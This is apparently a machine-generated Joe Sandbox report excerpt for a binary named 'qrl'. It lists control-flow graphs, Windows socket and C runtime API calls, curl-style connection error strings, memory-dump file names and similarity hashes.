                                                                                                                                                                                                                                                            control_flow_graph 504 23119b-2311bf 507 2313e3-2313f7 _amsg_exit 504->507 508 2311c5-2311e4 504->508 509 2311ea-2311ec 507->509 510 2313fd-23141d _initterm 507->510 508->509 508->510 512 231423-231429 509->512 513 2311f2-2311f9 509->513 510->512 510->513 514 231217-231257 call 4b7b50 SetUnhandledExceptionFilter call 4bd400 call 4b79d0 __p__acmdln 513->514 515 2311fb-231214 513->515 523 231271-231277 514->523 524 231259 514->524 515->514 526 231260-231262 523->526 527 231279-231284 523->527 525 2312b4-2312bc 524->525 528 2312d2-23130e malloc 525->528 529 2312be-2312c7 525->529 530 231290-231292 526->530 531 231264-231267 526->531 532 23126e 527->532 540 231310-231344 strlen malloc memcpy 528->540 535 2313c0-2313c4 529->535 536 2312cd 529->536 533 2312a5-2312ad 530->533 534 231294 530->534 531->530 538 231269 531->538 532->523 539 2312af 533->539 541 2312a0-2312a3 533->541 534->539 535->536 536->528 538->532 539->525 540->540 542 231346-231398 call 4b7680 call 2399d0 540->542 541->533 541->539 547 23139e-2313a6 542->547 548 23146c-231492 exit call 4b76c0 542->548 549 2313b2-2313bd 547->549 550 2313a8-2313ad _cexit 547->550 550->549
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                                                                                                                                                                            • String ID: PxK$!c($4i(
                                                                                                                                                                                                                                                            • API String ID: 738594520-413397025
                                                                                                                                                                                                                                                            • Opcode ID: 14b73724e2b419e611ecea88496f6d1196f77343441966e7b3795497397bf143
                                                                                                                                                                                                                                                            • Instruction ID: 71bdaf84ca5d4755b58c3bec0105ca2b3d38c080cd6a74d2c0c27206a81ca942
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14b73724e2b419e611ecea88496f6d1196f77343441966e7b3795497397bf143
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7517EB0A14341CFCB10EF69D884799B7F4FB54304F10542EDD88A7211E77898A9EFA6

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 553 2448f0-244914 554 244916-24491c 553->554 555 244928-24494a call 25d170 553->555 556 24491e-244927 554->556 559 244953-244956 555->559 560 24494c-244951 555->560 561 244958-24495b 559->561 562 244969-24496b 559->562 560->559 563 24496d-24496f 561->563 564 24495d-244960 561->564 565 244972-24499b call 25d280 562->565 563->565 564->565 566 244962-244967 564->566 569 24499d-2449bc 565->569 570 2449be-2449d1 call 267140 565->570 566->565 571 2449f0-2449fa 569->571 570->556 574 244a00-244a26 call 24b510 571->574 575 244ded-244df1 571->575 580 244a2c-244a2e 574->580 581 244afd-244b36 SleepEx getsockopt 574->581 575->571 577 244df7-244dff 575->577 577->556 579 244e05-244e0d 577->579 582 244e13-244e26 579->582 583 244f68-244f71 579->583 586 244a34-244a5f call 25d280 580->586 587 244af0-244af7 580->587 588 244b71-244b7b 581->588 589 244b38-244b4a WSAGetLastError 581->589 590 244f51-244f54 582->590 591 244e2c-244e31 582->591 584 244f73-244f79 583->584 585 244f7b-244f82 583->585 594 244fa3-244fcb call 249f70 call 267140 584->594 595 244f84-244f8a 585->595 596 244f8c-244f93 585->596 626 244a61-244a73 call 266fb0 586->626 627 244a7a-244a7c 586->627 587->581 597 244b82-244b84 587->597 592 244b50-244b52 588->592 593 244b7d 588->593 589->592 599 244e58-244e99 589->599 600 244f56-244f5d call 244ff0 590->600 601 244f60-244f62 590->601 591->590 602 244e37-244e4d 591->602 592->599 612 244b58-244b6c call 266fb0 592->612 593->599 594->556 595->594 609 244f95-244f9b 596->609 610 244f9d 596->610 605 244c70-244c7b 597->605 606 244b8a-244bc3 SleepEx getsockopt 597->606 607 244eb0-244ec6 call 268c70 599->607 608 244e9b-244ea5 call 244ff0 599->608 600->601 601->556 601->583 603 244f14-244f16 602->603 604 244e53 602->604 619 244f26-244f3b call 2452b0 603->619 620 244f18-244f1b 603->620 615 244f48-244f4c 604->615 622 244c81-244c97 WSASetLastError 605->622 623 244d28-244d31 605->623 616 244bc5-244bd2 WSAGetLastError 606->616 617 244bd7-244bde 606->617 607->556 641 244ecc-244edf 607->641 608->607 609->594 610->594 612->622 615->590 616->605 617->605 649 244fd0-244fdc 619->649 650 244f41-244f46 619->650 620->619 634 244f1d-244f22 620->634 636 244d21-244d23 622->636 637 244c9d-244d0e call 25d820 call 249f70 call 266fb0 622->637 623->575 626->627 627->605 633 244a82-244a86 627->633 633->605 639 244a8c-244ab2 call 25d280 633->639 634->620 640 244f24 634->640 636->575 672 244d14-244d1a 637->672 673 244dc0-244dc3 637->673 639->605 660 244ab8-244ac9 639->660 640->615 646 244ee1-244eec call 25f240 641->646 647 244eef-244ef7 call 244700 641->647 646->647 659 244efc-244f05 call 268d70 647->659 649->600 657 244fe2 649->657 650->615 654 244f0d-244f11 650->654 654->603 657->601 659->654 662 244c3c-244c3f 660->662 663 244acf-244ad8 660->663 667 244c41-244c4f call 244ff0 662->667 668 244c5d-244c61 662->668 669 244be3-244be8 663->669 670 244ade-244ae1 663->670 667->605 668->605 669->662 675 244bea-244bf8 669->675 676 244bfb-244c00 670->676 677 244d36-244d3b 672->677 678 244d1c-244d1f 672->678 680 244dc5-244dcf call 244ff0 673->680 681 244dd2-244dd9 673->681 675->676 676->662 679 244c02-244c0a 676->679 677->673 684 244d41-244d4f 677->684 683 244d52-244d57 678->683 688 244c0c-244c0f 679->688 689 244c1e-244c33 call 2452b0 679->689 680->681 686 244de9 681->686 687 244ddb-244de7 681->687 690 244da2-244daa 683->690 691 244d59-244d66 683->691 684->683 686->575 687->575 687->686 692 244c10-244c13 688->692 703 244c35-244c3a 689->703 704 244c51-244c5b 689->704 690->680 695 244dac 690->695 696 244d80-244d95 call 2452b0 691->696 697 244d68 691->697 692->689 698 244c15-244c1a 692->698 695->681 708 2449d6-2449e3 696->708 709 244d9b-244da0 696->709 700 244d70-244d73 697->700 698->692 701 244c1c 698->701 700->696 705 244d75-244d7a 700->705 701->662 703->662 703->679 704->667 704->668 705->700 707 244d7c-244db3 705->707 707->673 708->680 710 2449e9 708->710 709->690 709->691 710->681
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • After %ldms connect time, move on!, xrefs: 00244A62
                                                                                                                                                                                                                                                            • connect to %s port %ld failed: %s, xrefs: 00244CCB
                                                                                                                                                                                                                                                            • Failed to connect to %s port %ld: %s, xrefs: 00244FBA
                                                                                                                                                                                                                                                            • Connection failed, xrefs: 00244B5A
                                                                                                                                                                                                                                                            • Connection time-out, xrefs: 002449BE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: After %ldms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                                                                                                                                            • API String ID: 0-885759404
                                                                                                                                                                                                                                                            • Opcode ID: 70b1cdbbde2cdffcb4bd8b16c3530cedb0ff7e06f0008ff0b83f368c6ec7ed6d
                                                                                                                                                                                                                                                            • Instruction ID: 6796efb5b993aa9f8b67591f9f43266da7c83306ebe55533617afb9a47318eea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70b1cdbbde2cdffcb4bd8b16c3530cedb0ff7e06f0008ff0b83f368c6ec7ed6d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98023371A24702DFD729EF24D880B6AB7E4BF84318F150629EDA9572A1D730EC65CF42

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 743 24b510-24b53b 744 24b53d-24b540 743->744 745 24b55e-24b576 743->745 744->745 746 24b542-24b546 744->746 747 24b58d-24b5aa 745->747 748 24b578-24b58b call 25d170 745->748 751 24b87c-24b888 746->751 752 24b54c 746->752 749 24b5ac-24b5ca 747->749 750 24b5cf-24b5d2 747->750 748->747 749->750 755 24b5d4-24b5d6 750->755 756 24b60f-24b611 750->756 757 24b552-24b559 Sleep 752->757 758 24b613-24b623 WSASetLastError 752->758 759 24b628 755->759 760 24b5d8-24b5de 755->760 761 24b689-24b697 756->761 757->751 758->751 766 24b62a-24b631 759->766 762 24b5e0-24b5e5 760->762 763 24b602-24b60b 760->763 764 24b6e1-24b6ef 761->764 765 24b699-24b6af 761->765 768 24b5f0-24b5f4 762->768 763->766 771 24b60d 763->771 767 24b6f0-24b6fb 764->767 769 24b6b1 765->769 770 24b6cb-24b6cd 765->770 772 24b638-24b63c 766->772 775 24b720-24b722 767->775 776 24b6fd-24b719 767->776 768->763 777 24b5f6-24b600 768->777 778 24b6c0-24b6c4 769->778 779 24b6dc-24b6de 770->779 780 24b6cf-24b6d2 770->780 771->772 773 24b63e-24b645 772->773 774 24b66a-24b673 772->774 781 24b647-24b64f 773->781 782 24b65f-24b668 773->782 786 24b677-24b686 774->786 784 24b724-24b72c 775->784 785 24b732-24b76a select 775->785 783 24b72e 776->783 777->763 777->768 778->770 787 24b6c6-24b6c9 778->787 779->764 780->779 788 24b6d4-24b6d8 780->788 789 24b650-24b654 781->789 782->774 782->786 783->785 784->783 790 24b76c-24b774 WSAGetLastError 785->790 791 24b7b9-24b7bb 785->791 786->761 787->770 787->778 788->779 789->782 794 24b656-24b65d 789->794 795 24b776-24b780 790->795 796 24b793-24b795 790->796 792 24b7bd-24b7bf 791->792 793 24b7ff-24b804 791->793 797 24b7c1-24b7cb 792->797 798 24b7fb-24b7fd 792->798 793->751 794->782 794->789 795->751 799 24b786-24b78d 795->799 796->775 800 24b797-24b7b1 call 25d170 call 25d280 796->800 801 24b806 797->801 802 24b7cd-24b7f9 __WSAFDIsSet * 2 797->802 798->751 799->751 799->796 800->767 811 24b7b7 800->811 804 24b808-24b812 801->804 802->804 806 24b814-24b83e __WSAFDIsSet * 2 804->806 807 24b841-24b84b 804->807 806->807 807->751 809 24b84d-24b879 __WSAFDIsSet * 2 807->809 809->751 811->798
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 0024B553
                                                                                                                                                                                                                                                            • WSASetLastError.WS2_32(00002726), ref: 0024B618
                                                                                                                                                                                                                                                            • select.WS2_32(?,00000000,00000000,?,?), ref: 0024B761
                                                                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 0024B76C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$Sleepselect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2806104629-0
                                                                                                                                                                                                                                                            • Opcode ID: e93fb36646b7b8b516fb74cebd56fe72ff2828f4d5af2f926b2dae463499f97e
                                                                                                                                                                                                                                                            • Instruction ID: e3027770669acc3bdcb62716146dce9347983ed77bc2ffa56e8d462d6326a221
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e93fb36646b7b8b516fb74cebd56fe72ff2828f4d5af2f926b2dae463499f97e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5491F6316283058BD73ADF3888847ABB2EDAFD4710F154E2DE869C7190E770DD548B92

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 824 24b890-24b8aa 825 24b8cc-24b8d0 824->825 826 24b8ac-24b8b5 824->826 828 24b8d6 825->828 829 24bd42-24bd4e 825->829 826->825 827 24b8b7-24b8b9 826->827 830 24b8c0-24b8c5 827->830 831 24bc93-24bc98 WSASetLastError 828->831 832 24b8dc-24b8e3 Sleep 828->832 834 24b8c7-24b8ca 830->834 835 24b8e8-24b90a 830->835 833 24bc9e-24bca3 831->833 832->829 833->829 834->825 834->830 836 24b90c-24b919 call 25d170 835->836 837 24b91b-24b963 835->837 836->837 839 24b970-24b97e 837->839 841 24b9f0-24b9fb 839->841 842 24b980-24b988 839->842 843 24bb40-24bb4e 841->843 842->841 844 24b98a-24b99a 842->844 843->839 845 24bb54-24bb5f 843->845 846 24ba00-24ba04 844->846 847 24b99c-24b9a1 844->847 848 24bc74-24bc7f 845->848 849 24bb65-24bb85 845->849 850 24bb05-24bb0b 846->850 851 24ba0a-24ba15 846->851 852 24b9a7-24b9ab 847->852 853 24ba60 847->853 848->829 857 24bc85 848->857 854 24bb90-24bb9b 849->854 860 24bb11 850->860 861 24ba38-24ba3b 850->861 855 24ba34-24ba36 851->855 856 24ba17-24ba1c 851->856 858 24b9b1-24b9bc 852->858 859 24ba68-24ba6e 852->859 862 24ba62-24ba66 853->862 863 24bbc0-24bbc2 854->863 864 24bb9d-24bbb9 854->864 855->861 867 24ba57-24ba5a 855->867 865 24ba20-24ba24 856->865 857->831 866 24bc87-24bc8e Sleep 857->866 869 24b9e4-24b9e6 858->869 870 24b9be-24b9c7 858->870 859->862 872 24ba70-24ba77 859->872 860->867 861->867 868 24ba3d-24ba53 861->868 871 24ba91-24ba98 862->871 880 24bbc4-24bbcc 863->880 881 24bbd2-24bc12 select 863->881 877 24bbce 864->877 878 24ba26-24ba30 865->878 879 24ba32 865->879 866->829 867->852 867->853 868->867 869->872 873 24b9ec 869->873 882 24b9d0-24b9d4 870->882 875 24baa6-24baae 871->875 876 24ba9a-24baa1 871->876 872->871 874 24ba79-24ba8f 872->874 873->862 874->871 883 24bb16-24bb29 875->883 884 24bab0-24bac2 875->884 876->843 877->881 878->865 878->879 879->855 880->877 885 24bca8-24bcaa 881->885 886 24bc18-24bc20 WSAGetLastError 881->886 887 24b9d6-24b9e0 882->887 888 24b9e2 882->888 894 24baee-24baf1 883->894 895 24bb2b 883->895 889 24bac4-24bac9 884->889 890 24baea-24baec 884->890 885->833 891 24bcac-24bcae 885->891 892 24bc22-24bc2c 886->892 893 24bc3f-24bc48 886->893 887->882 887->888 888->869 897 24bad0-24bad5 889->897 890->894 890->895 898 24bcb4-24bcb9 891->898 899 24bd40 891->899 892->829 901 24bc32-24bc39 892->901 893->863 902 24bc4e-24bc69 call 25d170 call 25d280 893->902 894->895 900 24baf3-24bb03 894->900 896 24bb2f-24bb33 895->896 896->843 903 24bad7-24bade 897->903 904 24bae0-24bae7 897->904 905 24bcc0-24bccc 898->905 899->829 900->896 901->829 901->893 902->854 920 24bc6f 902->920 903->897 903->904 904->890 908 24bd30 905->908 909 24bcce-24bcde __WSAFDIsSet 905->909 911 24bd34-24bd3c 908->911 912 24bce4-24bcf6 __WSAFDIsSet 909->912 913 24bce0 909->913 911->905 917 24bd3e 911->917 914 24bcfc-24bd13 __WSAFDIsSet 912->914 915 24bcf8 912->915 913->912 918 24bd15-24bd1c 914->918 919 24bd20-24bd27 914->919 915->914 917->829 918->919 919->911 920->899
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                            • Opcode ID: 883ba4b48013f8b13f06d3867e17cd841f34b09509ea25bbc267c09305d73599
                                                                                                                                                                                                                                                            • Instruction ID: 78fa10645451b8c70e639dd5d38653567fcac0e96baaed0102618cc1b33a720e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 883ba4b48013f8b13f06d3867e17cd841f34b09509ea25bbc267c09305d73599
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40C1CE30A283468BD72EDF29C88476BB7E5EFC4714F148A2DE89997290E730DD54CB42

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                            • Opcode ID: a60dbbbe6f5fb130c621e96d48241f47b17249f92014bf455ed0e5069ee8bced
                                                                                                                                                                                                                                                            • Instruction ID: df490d4d141eeda974175d997706d8de901aeca285c57e45609a206a91339b17
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a60dbbbe6f5fb130c621e96d48241f47b17249f92014bf455ed0e5069ee8bced
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49F172F1C01B809BEB29AF21DC067C7F6A1AF10308F14497EE4AE15261F776B528DB56

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 209 23f390-23f3bd call 4b8550 212 23f3c8-23f3cf call 2396b0 209->212 213 23f3bf-23f3c2 209->213 220 23f3d1-23f3e6 strlen 212->220 221 23f42d-23f432 212->221 213->212 214 23f4a4-23f4b4 strcmp 213->214 216 23f4c6-23f4ce 214->216 217 23f4b6-23f4c4 fopen 214->217 219 23f4d1-23f4d5 216->219 217->219 225 23f4db-23f4f2 219->225 226 23f95f 219->226 223 23f499-23f4a2 free 220->223 224 23f3ec-23f41e call 243380 fopen 220->224 221->214 223->214 232 23f420-23f42b fclose 224->232 233 23f434-23f44c GetModuleFileNameA 224->233 228 23f514-23f516 225->228 229 23f964-23f970 226->229 231 23f520-23f531 fgets 228->231 234 23f533-23f535 231->234 235 23f5b0-23f5b2 231->235 232->223 233->223 238 23f44e-23f45b strrchr 233->238 239 23f580-23f58d _strdup 234->239 240 23f537-23f55d strlen * 2 realloc 234->240 236 23f5b8-23f5c2 235->236 237 23f93f 235->237 241 23f500-23f50d free 236->241 242 23f5c8-23f5cd 236->242 243 23f941-23f952 237->243 238->223 244 23f45d-23f475 strlen 238->244 239->237 247 23f593-23f5a0 strchr 239->247 245 23f563-23f57b strcpy 240->245 246 23f936-23f93c free 240->246 241->228 249 23f5d0-23f5de call 256fd0 242->249 243->229 255 23f954-23f95d fclose 243->255 244->223 250 23f477-23f497 call 243380 244->250 245->247 246->237 247->231 248 23f5a6-23f5a9 247->248 248->236 257 23f5f0-23f5f8 249->257 258 23f5e0-23f5e9 249->258 250->223 255->229 260 23f601-23f605 257->260 261 23f5fa 257->261 258->249 259 23f5eb 258->259 259->241 265 23f69b-23f6a0 260->265 269 23f60b-23f60d 260->269 261->241 261->260 262 23f882-23f884 261->262 263 23f8c0-23f8c2 261->263 264 23f905-23f929 call 239db0 261->264 261->265 266 23f8aa-23f8ac 261->266 267 23f87d-23f880 261->267 268 23f8bc-23f8be 261->268 262->267 263->267 264->265 271 23f6a3-23f6c8 call 235a00 265->271 266->267 272 23f886-23f888 267->272 268->267 273 23f611-23f61f call 256fd0 269->273 286 23f6eb-23f6ee 271->286 287 23f6ca-23f6cc 271->287 276 23f889-23f88c 272->276 282 23f642-23f646 273->282 283 23f621-23f629 273->283 279 23f8ae-23f8b0 276->279 280 23f88e-23f897 276->280 284 23f8b2-23f8b5 279->284 285 23f8c4-23f8cf 279->285 280->276 288 23f899-23f89f 280->288 293 23f698 282->293 294 23f648-23f650 282->294 290 23f637-23f63e 283->290 291 23f62b-23f631 283->291 284->285 292 23f8b7-23f8ba 284->292 285->271 296 23f786-23f788 286->296 297 23f6f4-23f707 286->297 287->286 295 23f6ce-23f6e6 287->295 288->263 289 23f8a1-23f8a3 288->289 289->262 289->263 289->264 289->265 289->266 289->267 289->268 290->273 302 23f640 290->302 291->294 298 23f633-23f635 291->298 292->272 301 23f699 293->301 294->301 303 23f652 294->303 295->296 299 23f78a-23f78d 296->299 300 23f78f-23f796 296->300 304 23f70d-23f711 297->304 305 23f83c-23f842 297->305 298->290 298->294 299->300 306 23f7db-23f805 strcmp 299->306 300->305 301->265 302->293 309 23f654-23f668 call 256fd0 303->309 304->305 310 23f717-23f734 malloc 304->310 307 23f844-23f84a free 305->307 308 23f84d-23f856 free 305->308 312 23f807-23f82b call 2395d0 call 239db0 306->312 313 23f82e 306->313 307->308 308->228 322 23f681-23f686 309->322 323 23f66a-23f66c 309->323 314 23f7d2-23f7d7 310->314 315 23f73a-23f781 call 2327c0 310->315 312->313 316 23f835-23f838 313->316 314->306 315->316 316->305 324 23f79b 322->324 325 23f68c-23f694 322->325 323->322 327 23f66e-23f676 323->327 330 23f79d-23f79f 324->330 325->309 328 23f696 325->328 327->325 331 23f678-23f67a 327->331 328->265 332 23f7a5-23f7a9 330->332 333 23f85b-23f876 strlen malloc 330->333 331->325 334 23f67c 331->334 335 23f7af-23f7bd call 256fd0 332->335 336 23f92e-23f931 332->336 333->272 337 23f878-23f97f free 333->337 334->330 341 23f7c3-23f7cb 335->341 342 23f8d4-23f8d7 335->342 336->265 337->243 341->335 344 23f7cd 341->344 342->336 343 23f8d9 342->343 345 23f8dc-23f8e2 343->345 344->336 345->336 346 23f8e4-23f8f0 call 256fd0 345->346 346->345 349 23f8f2-23f8fc 346->349 349->264 350 23f8fe 349->350 350->264 350->265
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
